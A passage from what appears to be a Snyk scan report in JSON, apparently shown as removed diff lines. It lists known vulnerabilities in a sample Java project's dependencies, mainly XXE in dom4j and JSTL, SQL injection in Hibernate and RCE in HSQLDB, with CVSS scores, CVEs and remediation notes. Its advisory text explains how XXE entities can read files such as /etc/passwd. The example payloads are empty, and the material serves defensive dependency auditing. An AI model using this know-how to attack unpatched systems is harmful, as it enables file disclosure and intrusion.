"high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:00:55.789489Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "assigner": "SUSE", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - 
"severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.900402Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", - "epssDetails": { - "percentile": "0.70906", - "probability": "0.00325", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-1000632" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-6pcc-3rfx-4gpm" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2019-04-10T16:07:04.634619Z", - "functions_new": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.QName", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-01T19:12:29Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2018-08-21T14:16:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.900402Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - 
"io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "dom4j:dom4j", - "version": "1.6.1", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-DOM4J-2812975", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.4, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/a822852", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:31.083245Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "type": "secondary", - "vector": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", - "epssDetails": { - "percentile": "0.79800", - "probability": "0.00664", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10683" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-hwj3-m3p6-hj38" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2022-05-10T12:56:27.582369Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2020-04-15T09:38:17Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2020-04-16T15:22:50Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.985080Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "dom4j:dom4j", - "version": "1.6.1", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-JAVAXSERVLET-30449", - "title": "XML External Entity 
(XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "credit": [ - "David Jorm" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "javax.servlet:jstl", - "references": [ - { - "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", - "title": "Apache Mail Archive" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", - "title": "NVD" - }, - { - "url": "https://access.redhat.com/security/cve/CVE-2015-0254", - "title": "RedHat CVE Database" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:45:52.623697Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", - "cvssV3BaseScore": 7.6, - "modificationTime": "2024-03-11T09:53:48.017447Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:43.270072Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:45:52.623697Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:48.017447Z" - } - ], - "description": "## 
Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", - "epssDetails": { - "percentile": "0.94002", - "probability": "0.07046", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-0254" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-6x4w-8w53-xrvv" - ] - }, - "packageName": "javax.servlet:jstl", - "proprietary": false, - "creationTime": "2017-02-22T07:28:19.341000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-02-27T16:13:27Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "javax.servlet", - "artifactId": "jstl" - }, - "publicationTime": "2015-02-27T16:51:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:48.017447Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "javax.servlet:jstl@1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "javax.servlet:jstl", - "version": "1.2", - 
"severityWithCritical": "high" - }, - { - "id": "snyk:lic:maven:javax.servlet:jstl:CDDL-1.0", - "type": "license", - "title": "CDDL-1.0 license", - "semver": { - "vulnerable": [ - "[1.2,)" - ] - }, - "license": "CDDL-1.0", - "language": "java", - "description": "CDDL-1.0 license", - "packageName": "javax.servlet:jstl", - "creationTime": "2024-06-18T08:06:13.191Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T08:06:13.191Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "javax.servlet:jstl@1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "javax.servlet:jstl", - "version": "1.2", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-1041788", - "title": "SQL Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,5.4.24.Final)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "5.4.24.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.2, - "functions": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", - "className": "SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Delete.java", - "className": "Delete", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Insert.java", - "className": "Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": 
"org/hibernate/sql/InsertSelect.java", - "className": "InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/QuerySelect.java", - "className": "QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Select.java", - "className": "Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/SimpleSelect.java", - "className": "SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "filePath": "org/hibernate/sql/Update.java", - "className": "Update", - "functionName": "toStatementString" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", - "title": "GitHub Commit" - }, - { - "url": "https://access.redhat.com/security/cve/cve-2020-25638", - "title": "Redhat CVE Details" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.2, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:14.190706Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - 
"assigner": "NVD", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.602540Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.086548Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", - "epssDetails": { - "percentile": "0.72103", - "probability": "0.00352", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-25638" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-11-19T16:51:52.251545Z", - "functions_new": [ - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Delete", - "functionName": "toStatementString" - } - }, - { - 
"version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Insert", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.InsertSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.QuerySelect", - "functionName": "toQueryString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Select", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.SimpleSelect", - "functionName": "toStatementString" - } - }, - { - "version": [ - "[,5.4.24.Final)" - ], - "functionId": { - "className": "org.hibernate.sql.Update", - "functionName": "toStatementString" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-11-19T16:51:45Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - "publicationTime": "2020-11-19T16:57:14.572204Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.086548Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-584563", - "title": "SQL 
Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Gail Badner" - ], - "semver": { - "vulnerable": [ - "[,5.3.18.Final)", - "[5.4.0.Final, 5.4.18.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.18.Final", - "5.4.18.Final" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", - "className": "LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-core", - "references": [ - { - "url": "https://github.com/hibernate/hibernate-orm/pull/3438", - "title": "GitHub Pull Request" - }, - { - "url": "https://hibernate.atlassian.net/browse/HHH-14077", - "title": "Jira Ticket" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:47.723462Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:28.265729Z" - }, - { - "type": "secondary", - 
"vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:49.262550Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", - "epssDetails": { - "percentile": "0.42797", - "probability": "0.00104", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14900" - ], - "CWE": [ - "CWE-89" - ] - }, - "packageName": "org.hibernate:hibernate-core", - "proprietary": false, - "creationTime": "2020-07-15T13:53:15.331818Z", - "functions_new": [ - { - "version": [ - "[5.1.18.Final ,5.4.18.Final)" - ], - "functionId": { - "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", - "functionName": "renderProjection" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-18T13:46:30Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-core" - }, - 
"publicationTime": "2020-07-15T16:40:12Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.262550Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final", - "severityWithCritical": "high" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.3.0.CR1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-core", - "creationTime": "2024-06-18T19:09:16.096Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T19:09:16.096Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGHSQLDB-3040860", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "credit": [ - "OSS Fuzz Team" - ], - "semver": { - "vulnerable": [ - "[,2.7.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.7.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hsqldb:hsqldb", - "references": [ - { - "url": 
"https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", - "title": "Chromium Bugs" - }, - { - "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", - "title": "GitHub Commit" - }, - { - "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", - "title": "Mitigation" - }, - { - "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", - "title": "SVN Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:55.045961Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": 